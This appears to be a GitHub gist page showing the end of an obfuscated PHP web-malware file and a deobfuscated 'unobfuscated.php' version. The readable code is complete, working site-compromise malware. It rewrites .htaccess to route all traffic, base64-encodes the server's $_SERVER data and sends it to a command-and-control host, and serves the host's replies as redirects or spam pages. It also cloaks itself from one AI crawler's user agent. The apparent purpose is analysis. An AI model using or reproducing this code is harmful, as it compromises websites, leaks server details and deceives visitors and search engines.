x6c\x73\x65\x74\x3e")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strstr($_II1loIO1IoO,"\x3c\x2f\x73\x69\x74\x65\x6d\x61\x70\x69\x6e\x64\x65\x78\x3e")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strpos($_II1loIO1IoO,"\x22\x75\x72\x6c\x73\x65\x74\x22")!==false||strpos($_II1loIO1IoO,"\x22\x73\x69\x74\x65\x6d\x61\x70\x69\x6e\x64\x65\x78\x22")!==false){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}if(strstr($_II1loIO1IoO,"\x3c\x68\x74\x6d\x6c")){header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38");exit($_II1loIO1IoO);}}$_II1loIO1IoO=OIlOo0O00110($_II1loIO1IoO);echo $_II1loIO1IoO;}}__l111O0Ol0(); ?>
Raw
unobfuscated.php
<?php
error_reporting(0);
/*
Malware signature
*/
define('C2_SIGNATURE', 'google.us:v2');
$documentRoot = $_SERVER['DOCUMENT_ROOT'] . '/';
$robotsFile = $documentRoot . 'robots.txt';
$htaccessFile = $documentRoot . '.htaccess';
$indexFile = $documentRoot . 'index.php';
$authPrefix = "## AUTH:";
$authKey = "";
/*
Detect protocol
*/
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off')
? 'https'
: 'http';
$GLOBALS['rewrite_enabled'] = false;
/*
---------------------------------------------------------
HTTP request helper
---------------------------------------------------------
*/
function httpRequest($url, $timeout = 5)
{
$response = '';
$status = 0;
if (function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
} else {
$context = stream_context_create([
"http" => [
"timeout" => $timeout,
"ignore_errors" => true
]
]);
$response = @file_get_contents($url, false, $context);
}
return [
'response' => $response,
'httpCode' => $status
];
}
/*
---------------------------------------------------------
Detect server type
---------------------------------------------------------
*/
function detectServerType()
{
$software = strtolower($_SERVER['SERVER_SOFTWARE'] ?? '');
if (strpos($software, 'apache') !== false) {
return 'apache';
}
if (strpos($software, 'nginx') !== false) {
return 'nginx';
}
$sapi = php_sapi_name();
if (strpos($sapi, 'apache') !== false) {
return 'apache';
}
if ($sapi === 'fpm-fcgi' || $sapi === 'cgi-fcgi') {
return 'nginx';
}
return 'unknown';
}
/*
---------------------------------------------------------
Rewrite detection
---------------------------------------------------------
*/
function rewriteWorks()
{
global $protocol;
$host = $_SERVER['HTTP_HOST'] ?? '';
$testPath = "/kiro-rewrite-test-" . substr(md5($host . "salt"), 0, 8);
$testUrl = $protocol . "://" . $host . $testPath;
$response = httpRequest($testUrl);
return strpos($response['response'], "##rewrite-ok##") !== false;
}
/*
---------------------------------------------------------
Create .htaccess if missing
---------------------------------------------------------
*/
function ensureHtaccess()
{
global $htaccessFile;
$rules = <<<HT
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^ - [L]
RewriteRule ^(.*)$ index.php [L,QSA]
</IfModule>
HT;
if (!file_exists($htaccessFile)) {
file_put_contents($htaccessFile, $rules);
}
}
/*
---------------------------------------------------------
Fetch remote payload
---------------------------------------------------------
*/
function fetchRemote($url, $auth = '')
{
$_SERVER['T'] = 'y';
$_SERVER['TPL'] = 7;
$_SERVER['VER'] = 1;
if ($auth !== '') {
$_SERVER['AUTH'] = $auth;
}
$payload = base64_encode(json_encode($_SERVER));
if (function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "ua=" . urlencode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 49);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$context = stream_context_create([
"http" => [
"method" => "GET",
"timeout" => 49
]
]);
return file_get_contents($url . "?ua=" . urlencode($payload), false, $context);
}
/*
---------------------------------------------------------
Main malware execution
---------------------------------------------------------
*/
function runMalware()
{
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$flag = $_GET['gpt'] ?? '';
/*
Cloaking behaviour
*/
if (strpos($userAgent, "ChatGPT-User/1.0") !== false && $flag === "true") {
exit("##okresponse##");
}
/*
Command and control server
*/
$c2 = "https://cdn.aihack.top/api/proxy/handle.php";
$content = fetchRemote($c2);
if (empty($content)) {
return;
}
/*
Redirect payload
*/
if (preg_match('/^https?:\/\//', $content)) {
header("Location: " . trim($content));
exit;
}
/*
Special command
*/
if (preg_match('/^##\//', $content)) {
exit(substr($content, 2));
}
/*
Large payload → treat as page content
*/
if (strlen($content) > 90) {
if (strpos($content, "<html") !== false) {
header("Content-Type: text/html; charset=utf-8");
exit($content);
}
if (strpos($content, "</urlset>") !== false) {
header("Content-Type: application/xml; charset=utf-8");
exit($content);
}
}
echo $content;
}
/*
---------------------------------------------------------
Run
---------------------------------------------------------
*/
ensureHtaccess();
runMalware();
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment